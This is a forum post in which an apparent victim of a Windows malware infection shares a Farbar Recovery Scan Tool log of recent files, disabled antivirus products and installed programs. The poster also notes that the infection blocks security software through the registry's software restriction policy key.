2014-08-22 14:32 - 2014-08-22 15:42 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:00 - 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-23 11:16 - 00000782 _____ () C:\Windows\setupact.log
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-23 16:22 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 18:19 - 2014-08-22 13:27 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 18:02 - 2014-08-22 16:10 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 17:58 - 2014-08-15 03:47 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 16:53 - 2014-08-22 21:40 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 16:51 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-23 16:54 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST
2014-08-23 16:54 - 2014-07-18 00:39 - 01159804 _____ () C:\Windows\WindowsUpdate.log
2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-23 16:30 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-23 16:30 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-23 16:27 - 2006-11-02 06:33 - 00694332 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-08-23 16:22 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-23 16:21 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2014-08-23 16:21 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-23 16:21 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-23 16:21 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-23 16:20 - 2014-08-22 16:12 - 00038790 _____ () C:\Windows\PFRO.log
2014-08-23 16:16 - 2014-08-23 16:16 - 00009460 _____ () C:\ComboFix.txt
2014-08-23 16:16 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox
2014-08-23 16:13 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini
2014-08-23 14:48 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas
2014-08-23 14:32 - 2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss
2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public
2014-08-23 14:20 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT
2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis
2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:53 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-23 11:25 - 2014-08-23 11:23 - 00001106 _____ () C:\Users\savas.kyriakidis\Desktop\Live PC Help.lnk
2014-08-23 11:16 - 2014-08-22 13:25 - 00000782 _____ () C:\Windows\setupact.log
2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-23 11:05 - 2014-08-23 11:02 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 21:40 - 2014-08-12 16:53 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:10 - 2014-08-12 18:02 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-22 15:42 - 2014-08-22 14:32 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:27 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-21 22:25 - 2011-12-22 18:52 - 00000680 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat
2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google
2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google
2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-17 17:23 - 2011-07-10 20:09 - 00000000 ____D () C:\$AVG
2014-08-17 16:31 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 18:01 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC
2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix
2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc
2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office
2014-08-15 19:54 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system
2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-15 03:47 - 2014-08-12 17:58 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple
2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple
2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 17:13 - 2011-08-28 07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL Folders
2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff
2014-08-12 16:51 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh
2014-08-04 03:06 - 2014-08-14 18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-08-23 16:28
 
==================== End Of Log ============================
Link to post
Share on other sites

Forgot to mention that this infection also edits the safer key in the registry to disable the anti-viral programs on the computer. Removing the safer\codeidentifiers\0\path part of the key allows those programs to run until the block is put back in place a few minutes later.

 

Addition.txt

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014
Ran by savas.kyriakidis at 2014-08-23 16:55:17
Running from F:\
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Disabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}
AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
AS: Microsoft Security Essentials (Disabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden
6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) Hidden
Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)
Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) Hidden
ActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)
Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)
Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKCU\...\Akamai) (Version:  - Akamai Technologies, Inc)
Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version:  - Any-Video-Converter.com)
Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )
AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)
AVG 2011 (Version: 10.0.1388 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1390 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1391 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1392 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1410 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1416 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.2109 - AVG Technologies) Hidden
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
bpd_scan (Version: 3.00.0000 - Hewlett-Packard) Hidden
BPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) Hidden
BPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) Hidden
Browser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)
BufferChm (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Catalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) Hidden
